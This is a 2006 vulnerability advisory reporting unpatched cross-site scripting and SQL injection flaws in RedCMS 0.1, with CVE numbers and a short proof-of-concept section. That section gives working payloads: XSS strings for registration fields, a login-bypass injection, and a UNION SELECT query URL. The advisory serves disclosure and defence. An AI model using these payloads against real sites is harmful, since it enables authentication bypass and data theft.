Multiple XSS and SQL Injection in RedCMS
Summary
- Vulnerability
- Multiple XSS and SQL Injection in RedCMS
- Discovered
- 2006.03.30
- Last Update
- 2006.04.09 Exploitation code published
- ID
- EV0115
- CVE
- CVE-2006-1568 CVE-2006-1569
- Risk Level
- medium
- Type
- Multiple Vulnerabilities
- Status
- Unpatched. No reply from developer(s)
- Vendor
- n/a
- Vulnerable Software
- RedCMS (http://redcms.co.uk/)
- Version
- 0.1
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple Vulnerabilities found in RedCMS (http://redcms.co.uk/) script.
1. Multiple Cross-Site Scripting Vulnerabilities.
Vulnerable Script:register.php
Parameters email, location, website are not properly sanitized. This can be used to post arbitrary HTML or web script code.
2. Multiple SQL Injections.
Vulnerable scripts: </p><p>login.php</p><p>profile.php</p><p>register.php</p><p>...</p>
Variables $username(login.php), $password(login.php), $u(profile.php), $username(register.php), $password(register.php),... All user-defined variables are not properly sanitized before being used in SQL queries. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc = off
PoC/Exploit
1. Cross-Site Scripting Example.
URL: http://[host]/redcms/register.php
Email: aaa'>[XSS]<aaa aaa=';
Location: aaa'>[XSS]<aaa aaa=';
Website: aaa'>[XSS]<aaa aaa=';
2. SQL Injection Examples.
URL: http://[host]/redcms/login.php
Username: ' or 1/*
Password: any
URL: http://[host]/redcms/profile.php? id=99'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,161,7,18,19,20/*
Solution.
Solution for "Multiple XSS and SQL Injection in RedCMS" is not available. Check vendor's website for updates.
Order Source Code Review
Check your website or web application by source code testing of a website made by eVuln team.The work will be done by experts in website security.